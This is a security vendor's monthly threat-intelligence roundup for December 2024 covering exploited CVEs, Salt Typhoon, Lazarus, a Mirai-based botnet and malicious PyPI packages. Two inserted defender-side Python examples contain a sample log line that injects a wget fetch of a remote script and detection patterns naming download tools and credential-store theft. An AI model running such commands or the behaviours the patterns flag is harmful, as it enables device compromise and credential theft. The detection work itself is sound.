Welcome to Picus Security's monthly cyber threat intelligence roundup!
Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.
Our Picus CTI platform will enable you to identify threats targeting your region, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.
In this section, we will provide information on the latest vulnerabilities and exploits being targeted by adversaries in the wild, the affected products, and the available patches.
On December 19, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-12356 to its Known Exploited Vulnerabilities (KEV) catalog. This critical command injection flaw, with a CVSS score of 9.8, affects BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products. It allows unauthenticated attackers to run arbitrary commands as the site user.
Figure 1. CISA added CVE-2024-12356 to its Known Exploited Vulnerabilities (KEV) catalog.
CISA cited evidence of active exploitation, urging users of self-hosted software to apply patches (BT24-10-ONPREM1/2) immediately. Cloud instances have already been updated.
This disclosure follows BeyondTrust's confirmation of a recent cyberattack, where threat actors exploited a stolen API key to reset passwords in Remote Support SaaS instances. Another medium-severity vulnerability, CVE-2024-12686, affecting administrative accounts, has also been patched in newer versions. BeyondTrust has notified affected customers.
On December 30, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3393 to its Known Exploited Vulnerabilities (KEV) catalog, citing active exploitation.
Figure 2. CISA added CVE-2024-3393 to its Known Exploited Vulnerabilities (KEV) catalog.
This high-severity denial-of-service (DoS) vulnerability affects Palo Alto Networks' PAN-OS software, specifically the DNS Security feature. An unauthenticated attacker can exploit this flaw by sending a specially crafted packet through the firewall's data plane, causing an unexpected reboot and potentially forcing the firewall into maintenance mode.
Palo Alto Networks has released patches to address this issue and recommends that affected users apply the updates promptly. CISA has set a remediation deadline of January 20, 2025, for federal agencies to secure their systems against this vulnerability.
On December 17, 2024, CISA added CVE-2024-55956 to its Known Exploited Vulnerabilities (KEV) catalog. This critical vulnerability affects Cleo Harmony, VLTrader, and LexiCom, managed file transfer products. The flaw allows unauthenticated attackers to exploit unrestricted file upload capabilities, enabling the execution of arbitrary Bash or PowerShell commands on the host system by leveraging the default Autorun directory settings.
Figure 3. CISA added CVE-2024-55956 to its Known Exploited Vulnerabilities (KEV) catalog.
CISA highlighted the vulnerability's use in ransomware campaigns, emphasizing its exploitation risk. The agency has set a remediation deadline of January 7, 2025, for federal agencies to secure affected systems.
Cleo has released guidance and mitigations to address the issue. Users are urged to apply the recommended updates or discontinue use if mitigations are unavailable to reduce the risk of exploitation.
Here are the most active threat actors that have been observed in December in the wild.
On December 20, 2024, we published the tactics, techniques, and procedures (TTPs) used by the Salt Typhoon APT group to shed light on their sophisticated and stealthy cyber espionage campaigns, particularly targeting the telecommunications sector. Just last week, Salt Typhoon breached its ninth U.S. telecom firm, focusing on unclassified communications and metadata linked to U.S. officials. The White House disclosed this latest victim after federal guidance uncovered critical vulnerabilities exploited in the attack.
Simultaneously, the Federal Communications Commission (FCC) is addressing funding shortfalls for the "Rip and Replace" program to remove insecure Chinese telecom equipment [2]. Estimated at $4.98 billion, the program faces a $3.08 billion gap. Bipartisan support for a defense bill aims to secure $3 billion and additional funds through spectrum auctions. The initiative is critical for safeguarding U.S. networks and rural connectivity, addressing national security risks posed by Chinese infrastructure.
The U.S. is intensifying efforts to secure its telecommunications infrastructure amid escalating concerns over Chinese cyber espionage. TP-Link, a Chinese manufacturer holding approximately 65% of the U.S. home and small business router market [3], is under investigation for potential national security risks due to vulnerabilities in its devices that have been exploited in cyberattacks.
On December 8, 2024, the U.S. Treasury Department fell victim to a cybersecurity breach orchestrated by Chinese state-sponsored Advanced Persistent Threat (APT) actors, identified as "Salt Typhoon" [4]. The breach exploited a compromised Remote Support SaaS platform provided by BeyondTrust, a privileged access management company. Attackers leveraged two zero-day vulnerabilities, CVE-2024-12356 and CVE-2024-12686, to reset passwords, gain privileged access, and steal sensitive documents remotely.
BeyondTrust detected the breach, revoked the stolen API key, and shut down all compromised instances. The FBI and CISA conducted an investigation, confirming no further unauthorized access. Salt Typhoon has also been linked to breaches in U.S. telecommunications, prompting CISA to recommend encrypted communication apps, while the U.S. considers banning China Telecom’s operations.
The Lazarus Group, linked to North Korea, has shifted its focus to the nuclear industry, targeting individuals within nuclear organizations. Previously associated with attacks on defense, aerospace, and cryptocurrency sectors, this marks an alarming escalation in their operations. Using fake job postings under “Operation DreamJob,” they deliver malicious files disguised as job assessments to infiltrate systems. Their arsenal includes sophisticated tools like Ranid Downloader and “CookiePlus,” a memory-resident, plugin-based malware that evades traditional security detection [1]. Recent campaigns also exploit zero-day vulnerabilities and deploy innovative malware like “RustyAttr” on macOS. These developments highlight the urgent need for strengthened cybersecurity in sensitive industries to counteract Lazarus Group's increasingly advanced tactics and persistent threat.
In December 2024, a variety of malware attacks were recorded, highlighting the persistent threat landscape. Below is a detailed list of the active malware incidents for the month.
On December 24, 2024, researchers reported a new Mirai-based botnet actively exploiting vulnerabilities in network video recorders (NVRs) and routers, including DigiEver DS-2105 Pro NVRs, TP-Link devices, and Teltonika RUT9XX routers. The campaign, identified as starting in October 2024, uses unpatched remote code execution (RCE) flaws and known vulnerabilities (CVE-2023-1389, CVE-2018-17532) to compromise devices [5].
The botnet exploits improper input validation in the DigiEver NVRs' /cgi-bin/cgi_main.cgi URI, enabling attackers to inject malicious commands. Compromised devices are enlisted into the botnet through malware binaries and cron jobs, enabling distributed denial-of-service (DDoS) attacks and propagation.
This botnet uses XOR and ChaCha20 encryption, targeting x86, ARM, and MIPS architectures, signaling evolved tactics among Mirai-based threats.
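As an added defender-side example (not code from the Picus roundup or from any vendor), the following Python triages an NVR's web access log for requests to the /cgi-bin/cgi_main.cgi path whose decoded query carries shell metacharacters or download helpers, which is what a command-injection attempt against that URI looks like from the defender's side. The log lines, the `page=` parameter name and the IP addresses are constructed for the example, and the metacharacter list is an assumption, not a signature from the report.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (common log format). The query
# parameter name and addresses are placeholders, not the device's real ones.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Dec/2024:10:01:02 +0000] "GET /cgi-bin/cgi_main.cgi?page=live HTTP/1.1" 200 512
203.0.113.9 - - [24/Dec/2024:10:01:07 +0000] "GET /cgi-bin/cgi_main.cgi?page=live;wget%20http://198.51.100.7/x.sh HTTP/1.1" 200 12
203.0.113.9 - - [24/Dec/2024:10:01:09 +0000] "POST /cgi-bin/cgi_main.cgi HTTP/1.1" 200 12
203.0.113.4 - - [24/Dec/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)
# Shell metacharacters and download helpers that have no business in a CGI query
# string; the list is an assumption of this example, tune it to your environment.
INJECTION_RE = re.compile(r'[;|`$&]|\b(wget|curl|tftp|chmod|busybox)\b|/bin/sh', re.IGNORECASE)
SUSPECT_PATH = "/cgi-bin/cgi_main.cgi"

def find_injection_attempts(log_text):
    """Return one dict per request that targets the CGI and looks injected."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a log line we understand; skip rather than guess
        parts = urlsplit(m["target"])
        if parts.path != SUSPECT_PATH:
            continue
        decoded = unquote(parts.query)  # metacharacters usually arrive URL-encoded
        if INJECTION_RE.search(decoded):
            hits.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"], "query": decoded})
    return hits

if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['method']} {hit['query']}")
```

A POST whose body carries the injected value is not visible in a standard access log, so pair this with request-body logging or network-level inspection where the device allows it.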
Fortinet FortiGuard Labs flagged two malicious Python packages, zebo and cometlogger, uploaded to the Python Package Index (PyPI). Together, these packages were downloaded 282 times—zebo 118 times and cometlogger 164 times—targeting users primarily in the U.S., China, Russia, and India. Both packages have since been removed from PyPI [6].
Zebo acted as spyware, leveraging obfuscation techniques to hide its command-and-control (C2) server. It logged keystrokes using the pynput library, captured hourly screenshots via ImageGrab, and exfiltrated data to ImgBB. Persistence was achieved by adding scripts to the Windows Startup folder.
Cometlogger was more advanced, siphoning credentials, cookies, and tokens from platforms like Discord, Steam, and TikTok. It also harvested system metadata, clipboard content, and network details, bypassed virtualized environments, and terminated browser processes to maximize its reach.
These incidents highlight the risks of interacting with unverified scripts from public repositories, emphasizing the need for careful scrutiny before execution.
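As an added example of the "careful scrutiny" the paragraph calls for (written for this page, not FortiGuard's tooling or the packages' own code), the following Python statically triages a package's source for the combination of behaviours the roundup attributes to zebo and cometlogger: pynput keystroke capture, PIL.ImageGrab screenshots, an ImgBB upload endpoint, Windows Startup-folder persistence and Chromium credential-store file names. The sample source is a constructed skeleton of imports and constants, and the indicator list and labels are assumptions of this example.

```python
import ast
import re
from pathlib import Path

# Indicators drawn from the behaviours described in the report; the mapping
# of import/string to label is this example's assumption, not a vendor rule.
SUSPECT_IMPORTS = {"pynput": "keystroke logging", "PIL.ImageGrab": "screen capture"}
SUSPECT_STRINGS = {
    re.compile(r"imgbb\.com", re.I): "image-host exfiltration",
    re.compile(r"Programs\W+Startup", re.I): "Startup-folder persistence",
    re.compile(r"Login Data|Local State", re.I): "browser credential store access",
}

def triage_source(src):
    """Return sorted indicator labels found in one Python source string."""
    findings = set()
    for node in ast.walk(ast.parse(src)):
        names = []
        if isinstance(node, ast.Import):
            names = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom) and node.module:
            names = [node.module] + [f"{node.module}.{a.name}" for a in node.names]
        for n in names:
            for mod, why in SUSPECT_IMPORTS.items():
                if n == mod or n.startswith(mod + "."):
                    findings.add(why)
    for pat, why in SUSPECT_STRINGS.items():
        if pat.search(src):  # string scan catches paths built from fragments
            findings.add(why)
    return sorted(findings)

def scan_tree(root):
    """Triage every .py file under root (e.g. an unpacked sdist); {path: labels}."""
    report = {}
    for p in Path(root).rglob("*.py"):
        try:
            findings = triage_source(p.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            findings = ["unparseable source"]  # worth a manual look on its own
        if findings:
            report[str(p)] = findings
    return report

# Constructed skeleton that only declares the imports and constants such a
# package would carry; it performs no action and is here as test input.
SAMPLE_SRC = '''import os
from pynput import keyboard
from PIL import ImageGrab
STARTUP = os.path.join(os.getenv("APPDATA", ""), "Microsoft", "Windows",
                       "Start Menu", "Programs", "Startup")
UPLOAD = "https://api.imgbb.com/1/upload"
'''
BENIGN_SRC = 'import json\ndef load(p):\n    return json.load(open(p))\n'
```

Run `scan_tree` against an unpacked distribution before installing it; a hit on two or more labels in one file is a strong reason to read that file by hand.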
[1] D. Ahmed, “Lazarus Group Targets Nuclear Industry with CookiePlus Malware,” Hackread - Latest Cybersecurity, Tech, Crypto & Hacking News, Dec. 23, 2024. Available: https://hackread.com/lazarus-group-nuclear-industry-cookieplus-malware/. [Accessed: Dec. 30, 2024]
[2] A. Khaitan, “US House to Vote on $3 Billion Funding for Removal of Chinese Telecom Equipment,” The Cyber Express, Dec. 24, 2024. Available: https://thecyberexpress.com/us-house-to-vote-on-rip-and-replace-program/. [Accessed: Dec. 30, 2024]
[3] The Wall Street Journal. Available: https://www.wsj.com/politics/national-security/us-ban-china-router-tp-link-systems-7d7507e6
[4] L. Abrams, “US Treasury Department breached through remote support platform,” BleepingComputer, Dec. 30, 2024. Available: https://www.bleepingcomputer.com/news/security/us-treasury-department-breached-through-remote-support-platform/. [Accessed: Jan. 02, 2025]
[5] B. Toulas, “New botnet exploits vulnerabilities in NVRs, TP-Link routers,” BleepingComputer, Dec. 24, 2024. Available: https://www.bleepingcomputer.com/news/security/new-botnet-exploits-vulnerabilities-in-nvrs-tp-link-routers/. [Accessed: Jan. 02, 2025]
[6] The Hacker News, “Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts,” The Hacker News, Dec. 24, 2024. Available: https://thehackernews.com/2024/12/researchers-uncover-pypi-packages.html. [Accessed: Jan. 02, 2025]